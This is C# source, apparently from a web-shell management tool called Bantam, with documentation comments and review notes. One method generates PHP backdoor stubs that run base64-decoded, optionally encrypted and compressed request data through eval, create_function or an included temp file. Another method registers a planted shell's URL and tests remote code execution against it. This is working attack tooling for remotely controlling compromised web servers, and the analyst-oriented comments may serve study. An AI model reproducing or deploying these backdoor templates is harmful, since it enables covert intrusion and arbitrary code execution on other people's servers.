/// <summary>
        /// Assembles, as a string, the PHP source of the server-side stub from the arguments and the
        /// current state of the form controls. The request value is wrapped, innermost to outermost, in
        /// base64 decoding, an optional decrypt call and an optional gzinflate call, and the wrapped
        /// expression is placed inside the construct selected by <paramref name="backdoorType"/>.
        /// </summary>
        /// <remarks>
        /// Besides its parameters the method reads checkBoxEncryptRequest, textBoxEncrpytionKey,
        /// checkBoxSendIVInRequest, textBoxIVVarName, textBoxEncrpytionIV, comboBoxRequestEncryptionType
        /// and chkbxMinifyCode.
        /// For analysts: the key, and the IV when it is not sent per request, are written into the output
        /// as string literals, so a generated file recovered from a host contains the key that file uses
        /// to decrypt incoming requests. Every emitted variant contains a base64_decode call applied
        /// directly to a request superglobal.
        /// varName, method, the key, the IV and the IV variable name are concatenated into the PHP text
        /// without any escaping.
        /// </remarks>
        /// <param name="varName">Name of the request parameter the emitted PHP reads the payload from.</param>
        /// <param name="method">Suffix of the PHP superglobal to read (placed after "$_"); upper-cased with the invariant culture before use.</param>
        /// <param name="gzInflateRequest">When true, the decoded (and, if enabled, decrypted) value is wrapped in a gzinflate call.</param>
        /// <param name="backdoorType">Selects the emitted template: EVAL, CREATE_FUNCTION or TMP_INCLUDE. Any other value is logged as an error.</param>
        /// <returns>
        /// The generated PHP text, passed through Helper.MinifyCode when chkbxMinifyCode is checked.
        /// For an unhandled <paramref name="backdoorType"/> the text is empty before that optional step.
        /// </returns>
        public string generateBackdoor(string varName = "command", string method = "COOKIE", bool gzInflateRequest = false, BackdoorTypes backdoorType = BackdoorTypes.EVAL)
        {
            // All wrapper fragments default to empty, so a layer that is not enabled (or fails the
            // checks below) simply contributes nothing to the emitted expression.
            string backdoorResult         = string.Empty;
            string gzInflateStart         = string.Empty;
            string gzInflateEnd           = string.Empty;
            string requestEncryptionStart = string.Empty;
            string requestEncryptionEnd   = string.Empty;

            // Invariant culture keeps the superglobal name stable regardless of the UI locale.
            string requestMethod = method.ToUpper(CultureInfo.InvariantCulture);

            // Request-decryption layer. NOTE(review): every failed check in this section (wrong key
            // length, empty IV variable name, wrong IV length, a cipher selection other than
            // "openssl"/"mcrypt") leaves both fragments empty without logging, so the output then has
            // no decrypt call even though the checkbox is ticked.
            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length == CryptoHelper.KEY_Length)
                {
                    if (checkBoxSendIVInRequest.Checked)
                    {
                        // IV travels with each request: the emitted code reads it from the same
                        // superglobal as the payload, under the configured variable name.
                        string encryptionIVVarName = textBoxIVVarName.Text;

                        if (!string.IsNullOrEmpty(encryptionIVVarName))
                        {
                            if (comboBoxRequestEncryptionType.Text == "openssl")
                            {
                                // Key is embedded as a literal; cipher string is fixed to AES-256-CBC.
                                requestEncryptionStart = "@openssl_decrypt(";
                                requestEncryptionEnd   = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, $_" + requestMethod + "['" + encryptionIVVarName + "'])";
                            }
                            else if (comboBoxRequestEncryptionType.Text == "mcrypt")
                            {
                                // The emitted rtrim call is given the literal "0" as its character list.
                                requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                                requestEncryptionEnd   = ", MCRYPT_MODE_CBC, $_" + requestMethod + "['" + encryptionIVVarName + "']), \"0\")";
                            }
                        }
                    }
                    else
                    {
                        // Static IV: embedded as a literal next to the key, so the same key/IV pair is
                        // used for every request handled by this generated file.
                        string encryptionIV = textBoxEncrpytionIV.Text;

                        if (!string.IsNullOrEmpty(encryptionIV) && encryptionIV.Length == CryptoHelper.IV_Length)
                        {
                            if (comboBoxRequestEncryptionType.Text == "openssl")
                            {
                                requestEncryptionStart = "@openssl_decrypt(";
                                requestEncryptionEnd   = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, '" + encryptionIV + "')";
                            }
                            else if (comboBoxRequestEncryptionType.Text == "mcrypt")
                            {
                                requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                                requestEncryptionEnd   = ", MCRYPT_MODE_CBC, '" + encryptionIV + "'), \"0\")";
                            }
                        }
                    }
                }
            }

            // Optional outermost layer: inflate after decrypting.
            if (gzInflateRequest)
            {
                gzInflateStart = "@gzinflate(";
                gzInflateEnd   = ")";
            }

            // Each template guards on isset() of the request variable and then hands the wrapped
            // expression gzinflate(decrypt(base64_decode(request value))) to a different PHP construct.
            switch (backdoorType)
            {
            // Direct eval of the wrapped request value.
            case BackdoorTypes.EVAL: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "@eval(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
                break;
            }

            //case BackdoorTypes.ASSERT: {
            //        backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@assert(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
            //        break;
            //    }

            // The wrapped request value becomes the body of an anonymous function, which is then called.
            case BackdoorTypes.CREATE_FUNCTION: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "$a=@create_function(null, " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
                                 "$a();\r\n}";
                break;
            }

            // The wrapped request value is written to a tmpfile() handle whose path is then included.
            // The emitted text opens the handle as $fp but the closing call names $f; the string is
            // emitted exactly as written here, so that mismatch appears in every generated file of
            // this variant.
            case BackdoorTypes.TMP_INCLUDE: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "$fp = @tmpfile();\r\n\t" +
                                 "$tmpf=@stream_get_meta_data($fp);\r\n\t" +
                                 "$tmpf=$tmpf['uri'];\r\n\t" +
                                 "@fwrite($fp, '<?php '." + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
                                 "@include($tmpf);\r\n\t@fclose($f);\r\n}";
                break;
            }

            //case BackdoorTypes.PREG_REPLACE: {
            //        //todo this looks wrong af and doesnt support gzip
            //        backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@preg_replace(\"/.*/\x65\", " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "']" + requestEncryptionEnd + gzInflateEnd + "),'.');\r\n}";
            //        break;
            //    }

            // Unhandled enum value: log it and fall through with an empty result.
            default:
                LogHelper.AddGlobalLog("Unknown backdoor type selection.", "GUI Error", LogHelper.LOG_LEVEL.ERROR);
                break;
            }

            // Minification is applied to whatever was produced above, including the empty string.
            if (chkbxMinifyCode.Checked)
            {
                backdoorResult = Helper.MinifyCode(backdoorResult);
            }
            return(backdoorResult);
        }
        /// <summary>
        /// Click handler that registers the URL from txtBoxShellUrl in BantamMain.Shells with the
        /// settings taken from the form controls, then sends a test PHP snippet to that URL and keeps
        /// the entry only when the (optionally decrypted) response is exactly "1".
        /// </summary>
        /// <remarks>
        /// On any failure after the entry was added, the entry is removed again and a status message is
        /// shown in labelDynAddHostsStatus. On success the shell data is initialised and the form closes.
        /// The handler is async void and contains no try/catch, so an exception from the awaited
        /// request is not handled inside this method.
        /// The request encryption key and IV are copied from the text boxes into the ShellInfo entry as
        /// plain strings.
        /// </remarks>
        /// <param name="sender">Event source; not used in the body.</param>
        /// <param name="e">Event arguments; not used in the body.</param>
        private async void btnAddShell_Click(object sender, EventArgs e)
        {
            string shellURL = txtBoxShellUrl.Text;

            // Nothing to do without a URL; no status message is shown in this case.
            if (string.IsNullOrEmpty(shellURL))
            {
                return;
            }

            // Validate key/IV lengths before touching the shared dictionary.
            // NOTE(review): 32 and 16 are hard-coded here, while generateBackdoor compares against
            // CryptoHelper.KEY_Length / CryptoHelper.IV_Length — presumably the same values; confirm.
            // NOTE(review): when the IV is sent in the request, textBoxIVVarName is not checked for
            // being empty here, although generateBackdoor requires it to be non-empty.
            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length != 32)
                {
                    labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
                    return;
                }

                if (!checkBoxSendIVInRequest.Checked)
                {
                    string encryptionIV = textBoxEncrpytionIV.Text;

                    if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
                    {
                        labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                        return;
                    }
                }
            }

            // If the URL is already registered, drop the old entry (GUI first, then the dictionary)
            // so the new settings replace it. The URL is written to the global log on failure.
            if (BantamMain.Shells.ContainsKey(shellURL))
            {
                BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

                if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
                {
                    LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                    return;
                }
            }

            // Register a fresh entry; it is populated field by field through the indexer below.
            // NOTE(review): every following access re-reads Shells[shellURL]; if the entry could be
            // removed elsewhere in between, the indexer would fail — confirm against other callers.
            if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
            {
                LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                return;
            }

            BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;

            // Only the "cookie" case is written; any other selection keeps the ShellInfo default
            // (not visible here).
            if (comboBoxVarType.Text == "cookie")
            {
                BantamMain.Shells[shellURL].SendDataViaCookie = true;
            }

            // The response encryption mode is only assigned when response encryption is enabled.
            if (checkBoxResponseEncryption.Checked == false)
            {
                BantamMain.Shells[shellURL].ResponseEncryption = false;
            }
            else
            {
                BantamMain.Shells[shellURL].ResponseEncryption     = true;
                BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
            }

            if (checkBoxGZipRequest.Checked)
            {
                BantamMain.Shells[shellURL].GzipRequestData = true;
            }
            else
            {
                BantamMain.Shells[shellURL].GzipRequestData = false;
            }

            // Snapshot the response settings for the test request below. When response encryption is
            // off, the mode read here is whatever the new ShellInfo started with.
            bool encryptResponse        = BantamMain.Shells[shellURL].ResponseEncryption;
            int  ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;

            // Request encryption settings: either (key + IV variable name) or (key + static IV);
            // the unused fields are reset to empty strings.
            if (checkBoxEncryptRequest.Checked)
            {
                BantamMain.Shells[shellURL].RequestEncryption    = true;
                BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;

                if (checkBoxSendIVInRequest.Checked)
                {
                    BantamMain.Shells[shellURL].SendRequestEncryptionIV           = true;
                    BantamMain.Shells[shellURL].RequestEncryptionIV               = string.Empty;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
                }
                else
                {
                    BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                }
            }
            else
            {
                BantamMain.Shells[shellURL].RequestEncryption = false;
                BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionIV  = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
            }

            // Connectivity check: send the test snippet and wait for the response.
            // Presumably ExecuteRemotePHP looks up the entry registered above for its settings,
            // which would be why the entry is added before the request — verify in WebRequestHelper.
            string         phpCode  = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
            ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

            // Empty response: roll back the registration.
            if (string.IsNullOrEmpty(response.Result))
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            string result = response.Result;

            // The key and IV used for decryption come from the response object, not from the form.
            if (encryptResponse)
            {
                result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
            }

            // Anything other than the exact string "1" counts as a failed check; roll back.
            if (string.IsNullOrEmpty(result) || result != "1")
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            BantamMain.Instance.InitializeShellData(shellURL);

            this.Close();
        }